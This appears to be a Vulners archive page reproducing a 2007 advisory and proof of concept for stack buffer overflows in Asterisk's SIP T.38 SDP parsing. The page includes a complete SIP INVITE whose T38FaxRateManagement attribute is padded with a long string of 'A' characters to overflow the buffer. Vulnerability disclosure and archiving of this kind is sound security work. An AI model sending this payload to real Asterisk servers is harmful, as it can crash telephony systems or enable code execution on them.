Vulners
Lucene search
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (1)
source: https://www.securityfocus.com/bid/23648/info
Asterisk is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data before copying it to insufficiently sized buffers.
Successful exploits may allow an attacker to execute arbitrary machine code to compromise an affected computer or to cause denial-of-service conditions.
Versions prior to Asterisk Open Source 1.4.3, AsteriskNOW Beta 6, and Asterisk Appliance Developer Kit 0.4.0 are vulnerable.
NOTE: These issues occur only when 't38 fax over SIP' is enabled in 'sip.conf'.
INVITE sip:[email protected] SIP/2.0
Date: Wed, 21 Mar 2007 4:20:09 GMT
CSeq: 1 INVITE
Via: SIP/2.0/UDP
10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport
User-Agent: NGS/2.0
From: "Barrie Dempster"
<sip:[email protected]:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672
Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
To: <sip:200@localhost>
Contact: <sip:[email protected]:5068;transport=udp>
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
Content-Type: application/sdp
Content-Length: 796
Max-Forwards: 70
v=0
o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
s=-
c=IN IP4 127.0.0.1
t=0 0
m=image 5004 UDPTL t38
a=T38FaxVersion:0
a=T38MaxBitRate:14400
a=T38FaxMaxBuffer:1024
a=T38FaxMaxDatagram:238
a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA
a=T38FaxUdpEC:t38UDPRedundancy Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4